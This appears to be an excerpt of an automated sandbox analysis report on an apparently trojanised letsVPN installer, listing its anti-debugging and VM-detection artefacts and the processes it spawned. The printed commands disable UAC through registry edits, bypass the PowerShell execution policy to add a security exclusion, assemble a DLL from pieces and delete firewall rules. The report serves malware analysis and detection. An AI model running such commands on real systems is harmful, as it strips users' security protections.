              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq$Hyper-V Hypervisor Logical Processor
              Source: svchost.exe, 00000023.00000003.2722572434.000002822711D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@vmnetextension
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq!Hyper-V Virtual Machine Bus Pipes
              Source: mmc.exe, 0000000F.00000002.3899626657.0000000003864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: mmc.exe, 00000012.00000002.3898317237.0000000002D28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\>
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq)Hyper-V Hypervisor Root Virtual Processor
              Source: LetsPRO.exe, 00000038.00000002.3957234819.000000005BBA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisorl
              Source: svchost.exe, 0000000C.00000002.3904085354.000001CF4D444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3904362361.000001CF4D457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3898635036.000001CF47C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000023.00000003.2723631251.0000028227117000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ethernetwlanppipvmnetextension4C}
              Source: svchost.exe, 00000023.00000003.2722572434.000002822711D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @vmnetextension
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq!Hyper-V Hypervisor Root Partition
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
              Source: LetsPRO.exe, 00000038.00000002.3902622698.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $jq*Hyper-V Dynamic Memory Integration Service
              Source: sinaplayer_service.exe, 00000011.00000002.3894778034.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm2_
              Source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachine
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-15880
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-17151
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-17172
              Source: C:\ProgramData\letsvpn-latest.exeAPI call chain: ExitProcess graph end node
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A038 IsDebuggerPresent,InitializeCriticalSectionAndSpinCount,DeleteCriticalSection,0_2_000000018002A038
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000DDF0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_000000018000DDF0
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5F08AC VirtualProtect ?,-00000001,00000104,?,?,?,0000001C17_2_6C5F08AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor,0_2_00000001800057CD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00865217 mov eax, dword ptr fs:[00000030h]53_2_00865217
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085EDE2 mov eax, dword ptr fs:[00000030h]53_2_0085EDE2
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800278D5 _errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,0_2_00000001800278D5
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess token adjusted: Debug
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00397D98 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter,17_2_00397D98
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5F480C __crtUnhandledException,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_6C5F480C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C57C7DB __crtSetUnhandledExceptionFilter,SetUnhandledExceptionFilter,17_2_6C57C7DB
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A7680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF7132A7680
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1178 SetUnhandledExceptionFilter,28_2_00007FF7132A1178
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A7798 SetUnhandledExceptionFilter,28_2_00007FF7132A7798
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_0085DAD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_0085DAD2
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00858A28
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858E32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00858E32
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00858FC5 SetUnhandledExceptionFilter,53_2_00858FC5
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xmlJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat" Jump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe "C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe" Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe" Jump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: letsvpn-latest.exe, 00000013.00000003.2329768871.0000000002830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: letsvpn-latest.exe, 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AddFontResourceWAdjustWindowRectAlready ReportedAssocIsDangerousAuditSetSecurityBITMAPINFOHEADERBringWindowToTopCRYPT_OBJID_BLOBCertControlStoreCheckRadioButtonCloseEnhMetaFileCoCreateInstanceCoGetCallContextCoGetInterceptorCoMarshalHresultCoTaskMemReallocCombineTransformConnectNamedPipeContent-EncodingContent-LanguageContent-Length: CopyEnhMetaFileWCreateDIBSectionCreateDirectoryWCreateHatchBrushCreateIpNetEntryCreateJobObjectWCreateMDIWindowWCreateNamedPipeWCreatePolygonRgnCreateSemaphoreWCreateSolidBrushCreateTimerQueueCryptDestroyHashCryptExportPKCS8CryptGetKeyParamCryptMsgGetParamCryptProtectDataCryptQueryObjectCryptSetKeyParamDAD_SetDragImageDPA_EnumCallbackDdeQueryConvInfoDdeSetUserHandleDeactivateActCtxDefMDIChildProcWDefineDosDeviceWDeleteColorSpaceDeleteIpNetEntryDeleteTimerQueueDestination-PortDispatchMessageWDnsNameCompare_WDrawCaptionTempWDrawFrameControlDuplicateTokenExEndBufferedPaintEngCreatePaletteEngDeletePaletteEngDeleteSurfaceEngGetDriverNameEngStretchBltROPEngUnlockSurfaceEnumChildWindowsEnumICMProfilesWExcludeUpdateRgnExtSelectClipRgnFONTOBJ_vGetInfoFRAME_SIZE_ERRORFindFirstFreeAceFindFirstVolumeWFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GdiGetBatchLimitGdiIsMetaPrintDCGdiSetBatchLimitGetAsyncKeyStateGetBestInterfaceGetCalendarInfoWGetClassLongPtrWGetClipboardDataGetComputerNameWGetConsoleAliasWGetConsoleTitleWGetConsoleWindowGetCurrentActCtxGetCurrentObjectGetCurrentThreadGetDIBColorTableGetDesktopWindowGetDllDirectoryWGetExpandedNameWGetFileSecurityWGetFullPathNameWGetGUIThreadInfoGetGestureConfigGetGlyphIndicesWGetGlyphOutlineWGetInterfaceInfoGetIpErrorStringGetKerningPairsWGetKeyboardStateGetLastInputInfoGetLogicalDrivesGetLongPathNameWGetMenuItemCountGetMenuItemInfoWGetMenuPosFromIDGetModuleHandleWGetNamedPipeInfoGetNetworkParamsGetOpenFileNameWGetPriorityClassGetProgmanWindowGetSaveFileNameWGetScrollBarInfoGetStringScriptsGetSysColorBrushGetSystemMetricsGetTaskmanWindowGetTcpStatisticsGetTempFileNameWGetThemeFilenameGetThemePartSizeGetThemePositionGetThemeSysColorGetThreadDesktopGetUdpStatisticsGetViewportExtExGetViewportOrgExGlobalDeleteAtomHANIMATIONBUFFERHost-Remote-ListIConnectionPointICreateErrorInfoILLoadFromStreamINTERFACE_HANDLEIOleAdviseHolderIOleInPlaceFrameIP_PREFIX_ORIGINIP_SUFFIX_ORIGINIPropertyStorageIUnknown_GetSiteIUnknown_SetSiteI_CryptDetachTlsI_RpcSendReceiveIcmpParseRepliesImageList_CreateImageList_DrawExImageList_RemoveImmConfigureIMEWImmCreateContextImmGetGuideLineWImmGetOpenStatusImmGetVirtualKeyImmRegisterWordWImmSetOpenStatusImperial_AramaicInitializeFlatSBInstRuneAnyNotNLInterfaceRemovedIntlStrEqWorkerWIpReleaseAddressIsBadHugeReadPtrIsDBCSLeadByteExIsDialogMessageWIsTokenUntrustedIsValidInterfaceJasonMarshalFailK32EnumProcessesLCIDToLocaleNameLPFNVIEWCALLBACKLPPERSISTSTORAGELPPRINTPAGERANGELPSHELLFLAGSTATELPSHFILEOPSTRUCTLPWPUPOSTMESSAGELPWSANSCLASSINFOLocalLinkAddressLocaleNameToLCIDLockWindowUpdateMIB_IPADDRROW_XPMIB_IPFORWARDROWMapVirtualKeyExWMeroitic_CursiveMonitorF
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00385EA0 cpuid 17_2_00385EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,0_2_0000000180023FF8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,0_2_0000000180023040
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,free,0_2_000000018001E840
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,0_2_00000001800148B8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_000000018001E9AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_00000001800239DC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,0_2_0000000180022280
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_0000000180023A90
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,0_2_0000000180021B1C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023B24
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,0_2_00000001800234AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: EnumSystemLocalesW,0_2_000000018001650C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,0_2_0000000180016550
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023D54
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,0_2_0000000180023560
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,free,0_2_00000001800215B0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,0_2_0000000180023664
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0000000180023EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,0_2_000000018001674C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,GetLocaleInfoW,0_2_0000000180023F50
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoW,17_2_6C570F41
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: GetLocaleInfoW,_errno,_invalid_parameter_noinfo,_errno,_errno,_errno,_invalid_parameter_noinfo,17_2_6C56CADD
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,wcsncmp,17_2_6C57845E
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,_wcsicmp,_wcsnicmp,_TestDefaultCountry,wcslen,wcsncpy_s,_getptd,__crtGetLocaleInfoEx,_wcsicmp,__crtGetLocaleInfoEx,_wcsicmp,wcslen,wcsncpy_s,wcslen,_TestDefaultCountry,wcslen,_invoke_watson,__crtGetLocaleInfoEx,17_2_6C578579
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtEnumSystemLocalesEx,EnumSystemLocalesW,17_2_6C578660
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcslen,wcslen,__crtEnumSystemLocalesEx,17_2_6C578683
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,IsValidCodePage,wcslen,wcsncpy_s,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,wcschr,wcschr,_itow_s,_GetLocaleNameFromLanguage,_GetLocaleNameFromLanguage,__crtGetLocaleInfoEx,_invoke_watson,17_2_6C578036
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,_wtol,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,17_2_6C577FE9
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,_wcsicmp,_TestDefaultLanguage,17_2_6C5F9841
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,GetLocaleInfoW,_wtol,GetLocaleInfoW,GetACP,17_2_6C5F996B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,_freea_s,malloc,17_2_6C571A74
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,GetLocaleInfoW,_GetPrimaryLen,wcslen,17_2_6C5F9A2C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,memset,_getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,_itow_s,17_2_6C5F9A96
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,free,_calloc_crt,strncpy_s,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,GetLastError,_calloc_crt,free,free,_invoke_watson,_malloc_crt,memcpy,_siglookup,17_2_6C571BFC
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,17_2_6C5F945C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcslen,wcslen,_GetPrimaryLen,EnumSystemLocalesW,17_2_6C5F954C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcslen,EnumSystemLocalesW,17_2_6C5F950C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcslen,_GetPrimaryLen,EnumSystemLocalesW,17_2_6C5F95C9
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,GetLocaleInfoW,_wcsicmp,_wcsnicmp,wcslen,GetLocaleInfoW,_wcsicmp,wcslen,_wcsicmp,_TestDefaultLanguage,17_2_6C5F964C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,wcsncpy_s,wcslen,wcscmp,wcscmp,memcpy,wcscpy_s,wcscpy_s,wcslen,wcsncpy_s,wcsncpy_s,___get_qualified_locale_downlevel,__crtIsValidLocaleName,__crtGetLocaleInfoEx,GetACP,wcsncpy_s,wcsncpy_s,wcsncpy_s,wcslen,wcsncpy_s,_invoke_watson,_errno,17_2_6C56314B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: wcslen,__crtEnumSystemLocalesEx,17_2_6C5F935F
